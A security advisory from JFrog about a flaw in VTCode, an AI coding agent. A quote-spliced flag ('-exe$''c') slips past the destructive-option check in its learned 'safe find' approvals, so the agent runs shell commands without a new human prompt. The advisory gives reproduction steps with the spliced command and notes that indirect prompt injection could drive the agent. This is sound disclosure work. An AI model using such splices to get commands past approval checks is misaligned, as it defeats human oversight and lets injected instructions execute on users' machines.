< Back

JFSA-2026-001694179 - VTCode is vulnerable to Arbitrary Command Execution via an ANSI-C Quote Bypass of the find Approval Check

CVE-2026-104247 | CVSS 6.3

JFrog Severity:medium

Discovered ByNatan Nehoraiof the JFrog Security Research Team

Published 5 Oct, 2026 | Last updated 5 Oct, 2026

VTCode is vulnerable to Arbitrary Command Execution via an ANSI-C Quote Bypass of the find Approval Check

vtcode (github.com/vinhnx/VTCode)

< 0.171.5

VTCode learns a family of safe find commands after a person approves three ordinary finds under the same workspace subdirectory. Later commands that share that family key run with no further prompt. The check that keeps destructive options out of the family compares tokens exactly (-exec, -delete, and a short list of siblings) in is_destructive_find_option inside src/agent/runloop/unified/tool_routing/shell_approval.rs.

An empty ANSI-C quote spliced into the flag (-exe$''c) does not match that list, so learned_find_pattern still treats the command as a safe find. Once the family has been learned, prompt_tool_permission auto-approves it and the shell runs it. The proven result is command execution as the user running VTCode, without a new approval prompt. Reaching that point takes a local session, those prior approvals, and something that can steer the agent, such as indirect prompt injection.


Step 1 - Install a vulnerable VTCode and open a trusted workspace


Use VTCode before 0.171.5 with the default approval prompts (HITL) enabled. The workspace needs a src directory.

cargo install vtcode --version 0.171.4

Step 2 - Approve three distinct safe finds


Ask the agent to run each of these, and approve each prompt. They must share the same top-level directory:

find src -type f -name '*.rs'
find src -type d
find src -name foo

Step 3 - Confirm the family now auto-approves


Ask for another ordinary find under src. VTCode should run it with no new prompt.

find src -type f

Step 4 - Send the spliced find


find src -maxdepth 0 -exe$''c touch /tmp/VT_BYPASS_POC {} +

Step 5 - Confirm the command ran without a prompt


ls -l /tmp/VT_BYPASS_POC

Expected output:

-rw-r--r--  1 <user>  <group>  0 <date> /tmp/VT_BYPASS_POC

On 0.171.5 or later, the same command does not inherit the safe-find family and still requires approval.

Upgrade to VTCode 0.171.5 or later. The release marks every version below 0.171.5 as affected.

An earlier change in 0.141.12 rejected this $'' splice only on a bare find. The follow-up in 0.171.5 (https://github.com/vinhnx/VTCode/pull/778, commit 5840697cd0dc8f94b9b53d88185329eecba8de11) is the first release the advisory treats as patched. It also refuses family learning for path-qualified find (./find, /usr/bin/find), mixed-case or quote-spliced flags, wrapper and environment prefixes, and compound commands.

Until you upgrade, do not rely on learned find approvals. Treat a workspace where an untrusted prompt can drive the agent as able to run shell commands after a few ordinary finds have been approved.

https://github.com/vinhnx/VTCode/security/advisories/GHSA-r249-hpfx-x2w7 https://github.com/vinhnx/VTCode/pull/778 https://github.com/vinhnx/VTCode/commit/5840697cd0dc8f94b9b53d88185329eecba8de11 https://github.com/vinhnx/VTCode/releases/tag/0.171.5 https://www.cve.org/CVERecord?id=CVE-2026-104247 https://github.com/vinhnx/VTCode

< Back